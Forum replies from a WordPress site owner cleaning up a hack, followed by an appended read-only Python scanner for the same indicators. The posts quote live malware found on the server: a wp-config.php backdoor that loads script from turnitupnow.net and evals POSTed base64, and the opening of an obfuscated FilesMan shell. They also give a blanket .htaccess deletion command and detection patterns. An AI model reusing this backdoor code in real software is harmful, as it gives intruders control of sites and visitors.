p-mt
Forum Replies Created
Forum: Fixing WordPress
In reply to: 3.3.1 Hacked by saveprefs.ru redirect
with
sudo grep -r turnitupnow * > badfiles.txt
I found A LOT more of this!
Forum: Fixing WordPress
In reply to: 3.3.1 Hacked by saveprefs.ru redirect
the above code is explained here: https://stackoverflow.com/questions/8068871/got-hacked-anyone-know-what-this-php-code-does
This code is also present in most of the php files of my theme!! I have to clean this up!
Forum: Fixing WordPress
In reply to: 3.3.1 Hacked by saveprefs.ru redirect
Hello,
since yesterday night, unfortunately, I again found activities on my server. Again several w????????w.php scripts (e. g. w77688816w.php) are coming up. In addition, I found a script sm5ek3.php (https://pastebin.com/rekKbXJb), which probably is the one described here: https://www.webhackblog.com/2011/10/31/sm3-php-spam-script/
I now decided to be more radical. Steps I have done:
– I deleted all older content which is not needed any more in DocumentRoot (made a backup before that with tar)
– made a backup of all plugins (tar)
– deleted all plugins (plan is to reinstall the needed ones later)
– deleted all older themes (I only keep the new ones coming with the fresh WordPress installation)
– I followed old_fart's recommendation to disable functions in php
— old-fart recommendation —
1. locate your php.ini file
2. replace there
disable_functions =
with
disable_functions = "apache_child_terminate, apache_setenv, define_syslog_variables, escapeshellarg, escapeshellcmd, eval, exec, fp, fput, ftp_connect, ftp_exec, ftp_get, ftp_login, ftp_nb_fput, ftp_put, ftp_raw, ftp_rawlist, highlight_file, ini_alter, ini_get_all, ini_restore, inject_code, mysql_pconnect, openlog, passthru, php_uname, phpAds_remoteInfo, phpAds_XmlRpc, phpAds_xmlrpcDecode, phpAds_xmlrpcEncode, popen, posix_getpwuid, posix_kill, posix_mkfifo, posix_setpgid, posix_setsid, posix_setuid, posix_setuid, posix_uname, proc_close, proc_get_status, proc_nice, proc_open, proc_terminate, shell_exec, syslog, system, xmlrpc_entity_decode"
3. force a restart of the http server
—– find and afterwards delete malware files by …
– … find . -name sm*.php -print
– … find . -name "w?????????.php" -print
– delete all .htaccess files with > find . -name ".htaccess" -exec rm {} \;
– recreate my wp-config.php from scratch!!!!
In the old one, I found this code, which probably isn't anything I like to have. Maybe this is the backdoor??:
"<?php global $sessdt_o; if(!$sessdt_o) { $sessdt_o = 1; $sessdt_k = "lb11"; if(!@$_COOKIE[$sessdt_k]) { $sessdt_f = "102"; if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } } else { if($_COOKIE[$sessdt_k]=="102") { $sessdt_f = (rand(1000,9000)+1); if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } $sessdt_j = @$_SERVER["HTTP_HOST"].@$_SERVER["REQUEST_URI"]; $sessdt_v = urlencode(strrev($sessdt_j)); $sessdt_u = "https://turnitupnow.net/?rnd=".$sessdt_f.substr($sessdt_v,-200); echo "<script src='$sessdt_u'></script>"; echo "<meta http-equiv='refresh' content='0;url=https://$sessdt_j'><!--"; } } $sessdt_p = "showimg"; if(isset($_POST[$sessdt_p])){eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));exit;} }"
Forum: Fixing WordPress
In reply to: 3.3.1 Hacked by saveprefs.ru redirect
do you think wordpress will work after that??
Forum: Fixing WordPress
In reply to: 3.3.1 Hacked by saveprefs.ru redirect
Hi Old_fart,
here you can find content of “w11756090n.php”: w11756090n.php
Forum: Fixing WordPress
In reply to: 3.3.1 Hacked by saveprefs.ru redirect
Hello together,
same issues on my site! I found this post quite useful: https://www.google.com/support/forum/p/Webmasters/thread?tid=7b5bc4f20bf9b3f3&hl=en
I looked for similar php files and found a lot, e. g.:
-rw-r--r-- 1 www-data www-data 23289 10. Jan 00:34 w21301478n.php
-rw-r--r-- 1 www-data www-data 23289 9. Jan 17:14 w37504127n.php
-rw-r--r-- 1 www-data www-data 23289 9. Jan 21:46 w50631636n.php
-rw-r--r-- 1 www-data www-data 23289 10. Jan 00:25 w69768580n.php
-rw-r--r-- 1 www-data www-data 23289 16. Jan 11:44 w11756090n.php
-rw-r--r-- 1 www-data www-data 23289 9. Jan 21:46 w12586317n.php
-rw-r--r-- 1 www-data www-data 23289 16. Jan 11:46 w15008865n.php
-rw-r--r-- 1 www-data www-data 23289 16. Jan 11:25 w17778828n.php
-rw-r--r-- 1 www-data www-data 23289 16. Jan 11:46 w25746672n.php
-rw-r--r-- 1 www-data www-data 23289 16. Jan 12:03 w25862560n.php
-rw-r--r-- 1 www-data www-data 23289 16. Jan 11:36 w40138369n.php
and much more.
Unfortunately, I couldn't understand the content. It starts with:
<?php $auth_pass="";$color="#df5";$default_action="FilesMan";$default_use_ajax=true;$default_charset="Windows-1251";preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'7X1re9s2z/Dn9VcwmjfZq+PYTtu7s2MnaQ5t2jTpcugp6ePJsmxrkS1PkuNkWf77C4CkERKi43S938N1vbufp7FIEARJk …
If anybody could or is interested in such a file for diagnostics, I could send it by email.
What I have done now is:
– Checking for unknown system users (wasn’t any)
– Changing all system passwords (root and users)
– Changing mysql root password
– Changing all mysql user passwords
I realized that every few minutes the .htaccess files get updated. My plan now is:
– to identify all w??????????n.php files and delete them (all are under Apache DocumentRoot).
– to delete unnecessary .htaccess files or delete unwanted content in these .htaccess files.
– check if the update of .htaccess files continues or is stopped.
Keep fingers crossed that this will help!
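As an added example (not code from this thread or from WordPress), a read-only Python scanner that applies the indicators the posts above describe to a DocumentRoot: the w????????n.php / sm*.php file names, the turnitupnow / $sessdt_ / eval(base64_decode( strings from the injected wp-config.php, the FilesMan marker of the obfuscated shell, and .htaccess files modified within the last hour. The fixture it scans is constructed with inert marker strings, and the pattern labels are my own naming.

```python
import os, re, tempfile, time
from pathlib import Path

# Indicators from the thread: random-named droppers (w12345678n.php / w77688816w.php), sm*.php
# spam scripts, strings from the injected wp-config.php code, and the FilesMan shell marker.
SUSPECT_NAME = re.compile(r"^(w\d{8}[nw]|sm[0-9a-z]+)\.php$")
SUSPECT_CONTENT = {
    "turnitupnow": re.compile(rb"turnitupnow"),
    "sessdt_cookie_gate": re.compile(rb"\$sessdt_"),
    "eval_base64": re.compile(rb"eval\s*\(\s*base64_decode\s*\("),
    "preg_replace_e": re.compile(rb"preg_replace\s*\(\s*['\"]/.*?/e['\"]"),
    "filesman_shell": re.compile(rb"FilesMan"),
}

def scan_docroot(root, htaccess_window_sec=3600, now=None):
    """Walk a DocumentRoot and report (never delete) files matching the indicators."""
    root = Path(root)
    now = time.time() if now is None else now
    findings = {"suspect_names": [], "suspect_content": {}, "recent_htaccess": []}
    for dirpath, _, files in os.walk(root):
        for name in sorted(files):
            path = Path(dirpath) / name
            rel = path.relative_to(root).as_posix()
            if SUSPECT_NAME.match(name):
                findings["suspect_names"].append(rel)
            # .htaccess being rewritten "every few minutes" is the persistence symptom in the thread
            if name == ".htaccess" and now - path.stat().st_mtime < htaccess_window_sec:
                findings["recent_htaccess"].append(rel)
            if name.endswith(".php") or name == ".htaccess":
                data = path.read_bytes()
                hits = [label for label, rx in SUSPECT_CONTENT.items() if rx.search(data)]
                if hits:
                    findings["suspect_content"][rel] = hits
    return findings

def build_sample_docroot(base):
    """Constructed fixture with inert marker strings only (no real malware)."""
    base = Path(base)
    (base / "wp-content").mkdir(parents=True, exist_ok=True)
    (base / "index.php").write_text("<?php require 'wp-blog-header.php';\n")
    (base / "wp-config.php").write_text("<?php global $sessdt_o; /* marker only */\n")
    (base / "wp-content" / "w21301478n.php").write_text('<?php $default_action="FilesMan";\n')
    (base / ".htaccess").write_text("RewriteEngine On\n")
    return base

def run_demo():
    """Scan the constructed fixture in a temp dir and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        return scan_docroot(build_sample_docroot(tmp))
```

Run `scan_docroot("/var/www/html")` against a real DocumentRoot and review each hit by hand before deleting anything; a fresh WordPress install produces no hits, so any output is worth a look.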